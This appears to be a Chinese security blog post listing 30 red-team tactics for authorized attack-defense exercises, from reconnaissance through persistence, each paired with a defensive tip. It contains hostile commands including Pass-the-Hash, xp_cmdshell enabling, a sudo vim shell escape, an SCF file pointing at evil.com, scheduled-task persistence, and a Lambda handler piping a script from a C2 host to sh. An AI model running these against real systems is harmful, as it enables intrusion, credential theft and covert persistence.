文章总结： 本文总结了攻防演练中红队的30条实战打点思路，涵盖信息收集、边界突破、权限提升、横向移动及权限维持五个阶段。内容详述了企业资产测绘、漏洞利用、云环境渗透等具体技术手法，并提供了相应的防御建议。文章强调操作合规性与痕迹清理，旨在帮助红队快速建立攻击据点并发现系统弱点，具有较高的实战参考价值。 综合评分： 87 文章分类： 红队,渗透测试,实战经验,内网渗透

---

实战攻防演练期间，你必备的30条红队打点思路！

原创

GhostShell GhostShell

乌雲安全

2026年3月5日 08:03 北京

从边缘突破到核心渗透的完整攻击链构建，在攻防演练中，红队的首要任务是快速建立有效攻击据点。本文基于项目经验，提炼出30条经过实战验证的打点思路，覆盖信息收集、漏洞利用、权限提升等关键环节，供参考。

---

一、信息收集阶段

1. 企业数字资产测绘

• • 手法： 通过企查查获取子公司列表 → 使用Amass进行关联域名发现 → Subfinder爆破三级域名

  subfinder -d example.com -o subdomains.txt

• • 案例：某电商企业通过子公司域名发现未下线的测试环境（test.retail.example.com）
• • 防御：建立自动化资产盘点系统，每周扫描暴露面

2. GitHub敏感信息狩猎

• • 实战技巧：

  # 使用GitHub API搜索API密钥
  requests.get("https://api.github.com/search/code?q=org:Company+filename:.env+password")

• • 关键发现：某金融机构泄露阿里云AK/SK导致OSS桶被拖取
• • 防护：部署GitGuardian等自动扫描工具

3. 历史漏洞关联利用

• • 操作路径： CNVD → ExploitDB → 目标企业名称
• • 典型漏洞：Struts2 S2-045（CVE-2017-5638）在老旧系统未修复
• • 加固：建立CVE漏洞生命周期管理机制

4. 证书透明度日志监控

• • 工具：CertSpotter实时监控新签发的域名证书
• • 战果：通过新证书发现未备案的vpn.newoffice.example.com
• • 防御：订阅CT日志告警

5. 员工信息画像构建

• • 方法： 社交媒体员工职位分析 + 脉脉部门架构 → 生成社工字典
• • 字典样例： {部门缩写}{姓名首字母}{入职年份}@example.com
• • 防护：员工安全意识培训+登录异常检测

---

二、边界突破技巧

6. 失效资产再利用

• • 场景： 接管废弃子域名（如停用的xx.example.com）

  # 验证DNS解析残留
  dig CNAME old-app.example.com

• • 案例：某物流公司停用系统未删除云解析记录
• • 防御：资产下线自动化清理流程

7. OAuth令牌劫持

• • 漏洞利用： 截获未校验state参数的OAuth回调请求
• • 工具：修改Burp OAuth插件实现自动化
• • 防护：强制PKCE校验+state参数绑定会话

8. API未授权访问

• • 高频漏洞点：

  GET /api/v1/users?page=1&size=100  # 用户信息泄露
  POST /actuator/refresh             # Spring Boot配置重载

• • 防御：网关层强制身份认证

9. 云存储桶接管

• • 攻击路径：

1. 1. 扫描s3.{region}.amazonaws.com
2. 2. 尝试aws s3 ls s3://bucket-name --no-sign-request

• • 战果：某视频平台配置桶可匿名写导致首页篡改
• • 加固：开启存储桶策略校验

10. 邮件服务器渗透

• • 手法：

  nmap -p25,465,587 --script smtp-open-relay target.com

• • 利用：通过开放转发发送钓鱼邮件
• • 防护：禁用SMTP匿名中继

11. VPN漏洞链利用

• • 经典组合拳： CVE-2019-11510（Pulse VPN）→ 读取/etc/passwd → 密码破解
• • 防御：VPN设备纳入高危漏洞快速响应机制

12. WAF绕过实战

• • SQL注入绕过：

  /*!50000SELECT*/ 1,2,3 FROM users  # MySQL内联注释

• • 工具：sqlmap tamper脚本定制
• • 防护：WAF规则深度调优（非默认规则）

13. 0day武器化投放

• • 操作守则：

• • 仅用于授权目标

• • 优先选择无文件攻击方式

• • 使用Cobalt Strike内存加载

• • 防护：EDR+流量沙箱联动分析

---

三、权限提升路径

14. Windows本地提权

• • 漏洞利用链：

  服务账户

  SeImpersonatePrivilege

  PrintSpoofer.exe

  SYSTEM权限

• • 工具：SweetPotato提权套件
• • 防御：禁用非必要服务权限

15. Linux sudo滥用

• • 检测命令：

  sudo -l | grep -E 'nmap|vim|find|python'

• • 经典利用：

  sudo vim -c ':!/bin/bash'  # 通过vim提权

• • 加固：最小化sudo权限

16. Kerberos委派攻击

• • 攻击流程：

1. 1. 使用BloodHound识别约束委派
2. 2. 通过s4u2self获取目标服务票据

• • 工具：Rubeus自动化利用
• • 防护：禁用非必要委派

17. 云角色权限提升

• • AWS场景：

  {
    "Effect": "Allow",
    "Action": "iam:PassRole",
    "Resource": "*"  // 高风险配置
  }

• • 利用：通过PassRole获得管理员权限
• • 防御：遵循最小权限原则

18. 数据库提权

• • MSSQL利用：

  EXEC sp_configure 'show advanced options',1;
  RECONFIGURE;
  EXEC sp_configure 'xp_cmdshell',1;
  RECONFIGURE;
  EXEC xp_cmdshell 'whoami';

• • 防护：删除危险存储过程

19. 计划任务劫持

• • Windows检测：

  Get-ScheduledTask | Where State -eq "Ready"

• • 利用：替换任务执行的脚本文件
• • 防御：计划任务文件ACL控制

20. DLL劫持路径

• • 工具：Process Monitor监控加载行为
• • 防护：启用DLL签名验证

---

四、横向移动策略（6种隐蔽通道）

21. NTLM中继攻击

• • 配置要点：

  [Responder]
  SMB = Off     # 禁用自身SMB服务
  HTTP = Off

• • 工具链：Responder + ntlmrelayx.py
• • 防御：启用SMB签名

22. Pass-the-Hash实战

• • 命令：

  crackmapexec smb 10.0.0.0/24 -u administrator -H <NTLM_HASH>

• • 防护：限制本地管理员权限

23. 金票据生成

• • 条件：

• • krbtgt的NTLM Hash

• • 域名SID

• • 工具：mimikatz kerberos::golden

• • 防御：定期重置krbtgt密码

24. WMI无文件渗透

• • 远程执行：

  Invoke-WmiMethod -ComputerName DC01 -Class Win32_Process -Name Create -ArgumentList "calc.exe"

• • 检测：Sysmon事件ID 19监控

25. SCF文件劫持

• • 武器化文件：

  [Shell]
  Command=2
  IconFile=\\evil.com\share\pentestlab.ico

• • 防护：禁用WebClient服务

26. 打印机漏洞利用

• • 漏洞：CVE-2021-1675（PrintNightmare）
• • 检测命令：

  rpcdump.py | grep MS-RPRN

• • 加固：禁用Point and Print

---

五、权限维持技巧

27. 隐藏计划任务

• • 创建命令：

  schtasks /create /tn "UpdateService" /tr "C:\malware.exe" /sc hourly /ru SYSTEM /f

• • 检测：Autoruns分析隐藏任务

28. 影子账户克隆

• • 步骤：

1. 1. 激活Administrator账户
2. 2. 修改注册表F值克隆账户

• • 工具：mimikatz ts::sessions
• • 防御：监控SAM数据库变更

29. Office加载项后门

• • 部署路径： %AppData%\Microsoft\Word\STARTUP\
• • 检测：启用宏执行日志审计

30. 云函数持久化

• • AWS Lambda示例：

  def handler(event, context):
      os.system("curl http://c2_ip/install.sh | sh")

• • 防护：函数代码完整性检查

---

红队行动备忘录

三条铁律：

1. 1. 所有操作必须获得书面授权
2. 2. 数据渗出需进行匿名化处理
3. 3. 清理所有攻击痕迹（包括内存驻留）

典型失败案例： 某红队因未清除Mimikatz内存dump被蓝队溯源，导致攻击路径完全暴露

攻防本质是成本对抗，红队的价值在于帮助企业以最小代价发现致命弱点。演练结束才是真正安全建设的开始。

---

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：乌雲安全 GhostShell GhostShell《实战攻防演练期间，你必备的30条红队打点思路！》